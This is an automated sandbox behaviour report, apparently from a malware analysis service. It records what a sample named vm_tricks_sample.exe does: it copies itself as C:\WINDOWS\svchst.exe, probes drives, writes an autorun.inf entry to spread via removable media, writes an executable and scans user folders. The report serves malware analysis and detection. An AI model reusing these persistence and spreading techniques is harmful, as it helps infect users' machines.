Memory written PID: 1764 Path: C:\vm_tricks_sample.exe Base: 400000 Length: 4096 Value: 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 540564737
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgrDisposition: BothDirectoryInformation Filemask: * success or wait 540569077
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgrDisposition: BothDirectoryInformation Filemask: unknown success or wait 540569246
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgrDisposition: BothDirectoryInformation Filemask: unknown no more files 540569389
Memory written PID: 1764 Path: C:\vm_tricks_sample.exe Base: 426000 Length: 73216 Value: 2E 66 FE FF 04 10 40 00 03 07 42 6F 6F 6C 65 61 6E 01 00 04 15 FF DD F6 FF 05 46 61 6C 73 65 04 54 72 75 65 8D 0D 2C 11 01 07 49 6E 74 65 67 65 72 FE BB 6F BB 04 21 80 FF 00 7F 8B C0 44 17 0A 06 53 74 72 69 6E 67 98 EF BD 41 E6 0B 00 1F 3A 0B 4D D3 74 CB 14 39 20 03 24 28 1C A0 EE BF 69 96 36 BC F8 07 54 4F 62 6A 65 63 74 A4 33 DB 6D D9 B0 07 0C 60 71 79 73 8A 6D 64 FF DD 6D 08 C4 12 0F 0A 49 98 72 66 61 63 65 C1 DB 41 CE BE 00 C0 2D 46 03 00 B2 CC 4F 32 D9 FF 83 44 24 04 F8 E9 11 00 49 64 09 8C A0 CC CC 21 9B FD BA F1 50 FB FE 11 40 48 4B 76 0D 41 BA 11 17 08 17 8C 0E 1D 11 C8 DD B7 C2 F7 1F 0C F3 4C 10 40 2F 79 C9 E5 3C 59 48 59 58 59 11 54 FD 85 D9 64 C6 64 F0 5F FF 25 B8 E1 42 00 20 83 0C F2 07 B4 B0 AC 83 0C 32 C8 A8 A4 A0 9C 0C 32 C8 20 98 94 90 32 success or wait 540621325
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom DictionaryDisposition: BothDirectoryInformation Filemask: unknown no more files 540622487
Memory written PID: 1764 Path: C:\vm_tricks_sample.exe Base: 438000 Length: 1024 Value: 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 02 00 06 00 00 00 20 00 00 80 0A 00 00 00 80 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 07 00 FA 0F 00 00 68 00 00 80 FB 0F 00 00 90 00 00 80 FC 0F 00 00 B8 00 00 80 FD 0F 00 00 E0 00 00 80 FE 0F 00 00 08 01 00 80 FF 0F 00 00 30 01 00 80 00 10 00 00 58 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 80 00 00 00 18 42 03 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 A8 00 00 00 70 44 03 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 D0 00 00 00 C4 46 03 00 EC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 F8 00 00 00 B0 47 03 00 98 01 00 success or wait 540640464
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\DictionariesDisposition: BothDirectoryInformation Filemask: unknown no more files 540641206
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\LinguisticsDisposition: BothDirectoryInformation Filemask: unknown no more files 540642226
Memory written PID: 1764 Path: C:\vm_tricks_sample.exe Base: 7FFDC008 Length: 4 Value: 00 00 40 00 success or wait 540651776
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\AdobeDisposition: BothDirectoryInformation Filemask: unknown no more files 540653740
Thread context set TID: 1520 PID: 1764 DR0: 0 DR1: 0 DR2: 0 DR3: 0 DR7: 0 EIP: 0 EFLAGS: 0 Imagepath: null success or wait 540667063
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\IdentitiesDisposition: BothDirectoryInformation Filemask: * success or wait 540669130
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\IdentitiesDisposition: BothDirectoryInformation Filemask: unknown success or wait 540669297
Thread resumed TID: 1520 PID: 1764 Path: C:\vm_tricks_sample.exe success or wait 540670250
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E}Disposition: BothDirectoryInformation Filemask: * success or wait 540699037
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E}Disposition: BothDirectoryInformation Filemask: unknown success or wait 540699482
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E}Disposition: BothDirectoryInformation Filemask: unknown no more files 540699623
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\IdentitiesDisposition: BothDirectoryInformation Filemask: unknown no more files 540704323
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\MacromediaDisposition: BothDirectoryInformation Filemask: * success or wait 540708944
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\MacromediaDisposition: BothDirectoryInformation Filemask: unknown success or wait 540709385
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash PlayerDisposition: BothDirectoryInformation Filemask: * success or wait 540734136
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash PlayerDisposition: BothDirectoryInformation Filemask: unknown success or wait 540736436
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjectsDisposition: BothDirectoryInformation Filemask: * success or wait 540742287
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjectsDisposition: BothDirectoryInformation Filemask: unknown success or wait 540742798
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWLDisposition: BothDirectoryInformation Filemask: * success or wait 540753511
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWLDisposition: BothDirectoryInformation Filemask: unknown success or wait 540753941
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWLDisposition: BothDirectoryInformation Filemask: unknown no more files 540754306
Process terminated PID: 484 Path: C:\vm_tricks_sample.exe success or wait 551465557

Analysis Process: vm_tricks_sample.exe PID: 1764 Parent PID: 484

General
Start time: 09:39:50
Start date: 24/01/2012
Path: C:\vm_tricks_sample.exe
Wow64 process (32bit): false
Commandline: C:\vm_tricks_sample.exe
Imagebase: 0x400000
File size: 196608 bytes
MD5 hash: 6B16C4526A013E744B3D91CD7A091C36

File Activites
File Opened
File Path Access Options Content overwritten Completion Count Source Address Symbol
C:\vm_tricks_sample.exe read attributes and synchronize and generic read sequential only and synchronous io non alert and non directory file and open reparse point true success or wait 1 429EC0 CopyFileA
File Created
File Path Access Attributes Options Completion Count Source Address Symbol
C:\WINDOWS\svchst.exe read attributes and delete and synchronize and generic write archive sequential only and synchronous io non alert and non directory file success or wait 1 429EC0 CopyFileA
File Path Offset Length Value Completion Count Source Address Symbol
File Path Offset Length Completion Count Source Address Symbol
Directory Information Queried
File Path Disposition File Mask Completion Count Source Address Symbol
C:\WINDOWS BothDirectoryInformation svchst.exe no such file 1 407930 FindFirstFileA
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activites
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\advapi32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\oleaut32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\shell32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 440000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 440000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 880000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 890000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 890000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 890000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 890000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 890000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 8B0000 618496 own pid readonly success or wait 1
C:\vm_tricks_sample.exe query and write and read and execute and extend size commit 8B0000 196608 own pid readonly success or wait 1
Section loaded by Program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\ws2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 4146F4
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 4146F4
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 4146F4
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 4146F4
\KnownDlls\ssleay32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 41F420
\KnownDlls\libeay32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 41F420
\KnownDlls\libssl32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 41F420

Registry Activites
Key Path Name Completion Count Source Address Symbol

Process Activites
PID Path Process info class Completion Count Source Address Symbol
Process Terminated
PID Filepath Completion Count Source Address Symbol
1764 C:\vm_tricks_sample.exe success or wait 1 404327 ExitProcess

Memory Activites
Memory Allocated
PID Filepath Base Length Protection Completion Count Source Address Symbol
1764 C:\vm_tricks_sample.exe 147000 12F848 page read and write success or wait 1 401A60 LocalAlloc
1764 C:\vm_tricks_sample.exe 960000 12FA74 page no access success or wait 1 401554 VirtualAlloc
1764 C:\vm_tricks_sample.exe 960000 12FA64 page read and write success or wait 1 401726 VirtualAlloc
Memory Protection Changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
1764 C:\vm_tricks_sample.exe 400000 1000 page read and write page read and write success or wait 2 437D1F VirtualProtect
Memory Usage Statistics
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
09:39:51 0 2 0
09:39:52 0 2 0

System Activites
System info class Completion Count Source Address Symbol

Timing Activites
Time Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Memory attributes changed PID: 1764 Path: C:\vm_tricks_sample.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page read and write success or wait 541777619
Memory attributes changed PID: 1764 Path: C:\vm_tricks_sample.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page read and write success or wait 541777946
Memory allocated PID: 1764 Path: C:\vm_tricks_sample.exe Base: 147000 Length: 12F848 Allocation Type: unknown Protection: page read and write success or wait 541786373
Memory allocated PID: 1764 Path: C:\vm_tricks_sample.exe Base: 960000 Length: 12FA74 Allocation Type: unknown Protection: page no access success or wait 541787147
Memory allocated PID: 1764 Path: C:\vm_tricks_sample.exe Base: 960000 Length: 12FA64 Allocation Type: unknown Protection: page read and write success or wait 541787392
Section loaded Path: \KnownDlls\ws2_32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 541793785
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 541806667
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 541845625
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 541914105
Section loaded Path: \KnownDlls\ssleay32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 542309955
Section loaded Path: \KnownDlls\libeay32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 542340440
Section loaded Path: \KnownDlls\libssl32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 542357169
Directory Information Queried Path: C:\WINDOWSDisposition: BothDirectoryInformation Filemask: svchst.exe no such file 542381499
File opened Path: C:\vm_tricks_sample.exe Access: read attributes and synchronize and generic read Options: sequential only and synchronous io non alert and non directory file and open reparse point Attributes: none Content Overwritten: true success or wait 542382847
File created Path: C:\WINDOWS\svchst.exe Access: read attributes and delete and synchronize and generic write Options: sequential only and synchronous io non alert and non directory file Attributes: archive Content Overwritten: true success or wait 542384456
Process terminated PID: 1764 Path: C:\vm_tricks_sample.exe success or wait 550202202

Analysis Process: svchst.exe PID: 1508 Parent PID: 664

General
Start time: 09:39:51
Start date: 24/01/2012
Path: C:\WINDOWS\svchst.exe
Wow64 process (32bit): false
Commandline: unknown
Imagebase: 0x400000
File size: 196608 bytes
MD5 hash: 6B16C4526A013E744B3D91CD7A091C36

File Activites
File Opened
File Path Access Options Content overwritten Completion Count Source Address Symbol
z: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
y: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
x: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
w: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
v: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
u: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
t: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
s: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
r: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
q: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
p: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
o: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
n: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
m: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
l: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
k: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
j: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
i: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
h: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
g: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
f: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
e: read attributes and synchronize synchronous io non alert and non directory file false object name not found 2 414288 GetDriveTypeA
G: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
H: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
I: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
J: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
K: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
L: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
M: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
N: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
O: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
P: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
Q: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
R: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
S: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
T: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
U: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
V: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
W: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
X: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
Y: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
Z: read attributes and synchronize synchronous io non alert and non directory file false object name not found 6 414288 GetDriveTypeA
c:\autorun.inf read attributes and synchronize and generic read sequential only and synchronous io non alert and non directory file and open reparse point true success or wait 1 415700 CopyFileA
File Created
File Path Access Attributes Options Completion Count Source Address Symbol
C:\WINDOWS\mssys.dll read attributes and synchronize and generic write system synchronous io non alert and non directory file object name collision 1 413FC0 CreateFileA
c:\autorun.inf read attributes and synchronize and generic write none synchronous io non alert and non directory file success or wait 1 41628E CreateFileA
D:\ read attributes and delete and synchronize and generic write archive sequential only and synchronous io non alert and non directory file access denied 3 415700 CopyFileA
File Deleted
File Path Completion Count Source Address Symbol
C:\autorun.inf success or wait 1 4160A5 DeleteFileA
File Written
File Path Offset Length Value Completion Count Source Address Symbol
1508 unknown 67072 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 40 00 c3 b2 21 6e 90 b2 21 6e 90 b2 21 6e 90 ac 73 ea 90 90 21 6e 90 ac 73 fb 90 a2 21 6e 90 ac 73 ed 90 df 21 6e 90 95 e7 15 90 b1 21 6e 90 b2 21 6f 90 d3 21 6e 90 ac 73 e7 90 b5 21 6e 90 ac 73 ff 90 b3 21 6e 90 52 69 63 68 b2 21 6e 90 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5d 34 88 4f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 00 01 00 00 10 00 00 00 b0 05 invalid handle 1 414018 WriteFile
C:\autorun.inf unknown 23 5b 61 75 74 6f 72 75 6e 5d 0d 0a 6f 70 65 6e 3d 5a 77 72 2e 65 78 65 success or wait 1 4162D6 WriteFile
File Path Offset Length Completion Count Source Address Symbol
Directory Information Queried
File Path Disposition File Mask Completion Count Source Address Symbol
C:\WINDOWS\Temp BothDirectoryInformation <.exe no such file 1 41410C FindFirstFileA
C:\WINDOWS\Web BothDirectoryInformation <.exe no such file 1 41410C FindFirstFileA
C:\ BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\ BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Collab BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0 BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRW BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grm BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\sgr BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Adobe BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
